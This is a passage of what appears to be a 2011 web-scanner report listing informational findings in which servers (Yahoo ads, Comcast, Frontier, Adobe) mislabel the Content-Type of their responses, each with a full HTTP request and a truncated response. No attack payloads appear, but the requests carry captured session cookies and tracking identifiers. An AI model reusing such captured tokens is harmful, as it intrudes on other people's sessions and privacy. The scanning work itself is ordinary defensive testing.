Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:103:4:0:55175:1315313297:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1284

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpj
...[SNIP]...

25.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1027

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.
...[SNIP]...

25.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1142

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wj
...[SNIP]...

25.6. http://ads.yimg.com/a/a/ma/matt/yahoo_realestate_home180x40.jpeg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.yimg.com
Path:   /a/a/ma/matt/yahoo_realestate_home180x40.jpeg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /a/a/ma/matt/yahoo_realestate_home180x40.jpeg HTTP/1.1
Host: ads.yimg.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 01:56:15 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 01:56:15 GMT
Last-Modified: Thu, 04 Aug 2011 17:06:23 GMT
Accept-Ranges: bytes
Content-Length: 4151
Content-Type: image/jpeg
Age: 38934
Proxy-Connection: keep-alive
Server: YTS/1.19.5

.PNG
.
...IHDR.......(.......G]....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

25.7. http://amch.questionmarket.com/adsc/d847178/33/873120/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d847178/33/873120/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d847178/33/873120/randm.js HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:54 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Sat, 30 Jul 2011 04:01:37 GMT
ETag: "a51e4f9c-1-745c0a40"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Tue, 06 Sep 2011 13:14:54 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Type: application/x-javascript

;

25.8. http://beacon.dedicatednetworks.com/js/t.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.dedicatednetworks.com
Path:   /js/t.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/t.aspx?aid=084BF99942C00D12 HTTP/1.1
Host: beacon.dedicatednetworks.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/premier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP=\'IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\'
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:59:04 GMT
Content-Length: 211

var axel = Math.random()+"";
var a = axel * 10000000000000;
document.write('<IMG SRC="https://ad.doubleclick.net/activity;src=2736591;type=oomap527;cat=connm417;ord=1;num='+ a + '?" WIDTH=1 HEIGHT=1 B
...[SNIP]...

25.9. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; BA=t=1315331123

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1183.adx.ne1.yahoo.com compressed/chunked Tue Sep 6 12:45:35 UTC 2011 -->

25.10. http://cimage.adobe.com/omninav/thin_omninav2.0.4.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cimage.adobe.com
Path:   /omninav/thin_omninav2.0.4.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /omninav/thin_omninav2.0.4.js HTTP/1.1
Host: cimage.adobe.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: storeregion=; s_vi=[CS]v1|272F173A85013C4B-60000106C0356B2B[CE]; UID=408BD657%2DBBDF%2DB561%2D47843A1059325B5B; op537volumelicensinggum=a00c02502m278vr07v3a22278vr08138v87c9; AWID=172.26.150.8.1314799484806; company_history=%5B%5B%22http%3A//support.muse.adobe.com/muse%22%2C%22Muse%22%5D%5D; is_human=true; mbox=PC#1314797047557-324714.19#1316024271|session#1314813238023-632011#1314816531|disable#browser%20timeout#1314817080|check#true#1314814731

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "9bdfb6653972b784e1a414bd658816a7:1300309916"
Last-Modified: Wed, 16 Mar 2011 21:11:56 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 11721
Date: Tue, 06 Sep 2011 12:24:23 GMT
Connection: close

O="context.checkS.match.part.if(.et.results.){var .Sizzl.expr.ele.){..length.functi.Expr..type.===.;}.for(var.r.urn .isXML..on(.[i].re.curLoop.s.ctor.ilter.heck.ode.tr.isPartS..nQTyp.=null.else.und...
...[SNIP]...

25.11. http://comcast-www.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://comcast-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=comcast&code=www&timeout=undefined&onFailure=undefined HTTP/1.1
Host: comcast-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:22:13 GMT
Content-Length: 80021


                           baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...

25.12. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /m2/comcastresidentialservices/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/comcastresidentialservices/mbox/standard?mboxHost=sitesearch.comcast.com&mboxSession=1315327839174-766376&mboxPage=1315329733349-634146&mboxCount=1&internalkeyword=xss&mbox=Search_Image_Promos&mboxId=0&mboxTime=1315311733394&mboxURL=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: comcastresidentialservices.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 174
Date: Tue, 06 Sep 2011 12:22:13 GMT
Server: Test & Target

mboxFactories.get('default').get('Search_Image_Promos',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315327839174-766376.19");

25.13. http://customer.comcast.com/App_Themes/Default/img/SubChannelSelected.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://customer.comcast.com
Path:   /App_Themes/Default/img/SubChannelSelected.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /App_Themes/Default/img/SubChannelSelected.gif HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Referer: http://customer.comcast.com/Pages/FAQViewer.aspx?Guid=f8578a5e-0241-452c-ba18-278c838ac946
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; ServerID=1035; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"pv":8,"lc":{"d0":{"v":8,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; ASP.NET_SessionId=wz5mknqosvb1zefgqhr2jlu3; fsr.a=1315329901557; mbox=session#1315327839174-766376#1315331762|PC#1315327839174-766376.19#1316539502|check#true#1315329962

Response

HTTP/1.0 200 OK
Content-Length: 686
Content-Type: image/gif
Last-Modified: Tue, 19 Jul 2011 19:16:10 GMT
Accept-Ranges: bytes
ETag: "0f926514846cc1:877d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:25:01 GMT
Connection: close

......JFIF.....`.`......Exif..II*..............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222..........."......
...[SNIP]...

25.14. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D8383746361359954%3F&uid=TVYMYp4lQTRs9JsS_40986728&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1315331134985-48379358672536910&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=87AC969D42D890DD653C91255184546D; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Tue, 06 Sep 2011 12:45:59 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_40986728");

25.15. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Content-Length: 542
Content-Type: text/css
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:38 GMT

<STYLE TYPE="text/css">
   h1,p{
       margin:0px !important;
   }
   .tableft{
       background-image:url(../Images/tableft.gif);
   }
   .tabright{
       background-image:url(../Images/tabright.gif);
   }
   #tabm
...[SNIP]...

25.16. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /Controls/SharedWebMethods.aspx/GetCurrentLocale HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
Content-Length: 12
Origin: http://frontier.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 2

""

25.17. http://frontier.my.yahoo.com/e/js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://frontier.my.yahoo.com
Path:   /e/js

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /e/js?_action=show&_subAction=getThumbnail&ids=%5B%22id-482243%22%2C%22id-482610%22%5D&start=0&maxItems=6&test=&_id=a81b32&_tags=%5B%5D&_txnid=2&_crumb=O2TJF8Qm5TbVJKQVIyb0I.&_mode=json HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; myc=d=lgdbPCk32jI29Q_3alrTFdhUdvOS62KbYqbV15OhgNs5GX2tKBQbpx35R0zRmbc2LUGd9sm6Lxpmg9WFDPpxD__c009fz2GVX66td5mnZiW9ywKdpzLhUpvxPx0_YO8eLJoOmTCvIsU8dDnHSWUDxusuL9oofD8AewPqJHs645ckvFUSiZu58gMSalbacmvEfnPeELo1NplZ5H_oqzFeO8oDRo2YEgWvthq8q6VXUFZGvUFYTsX0Ch0O1C2lcf9XCCOjpDQMZJUMyxiaGSYFyQf7RTgcBtAylyd7gThn4Q1pX01g2Ad71BW5.EMxvBmfLZRYnVhVx2p9Hg3WuT.vWOvGVQqDsCX12VG21FoM&v=2; 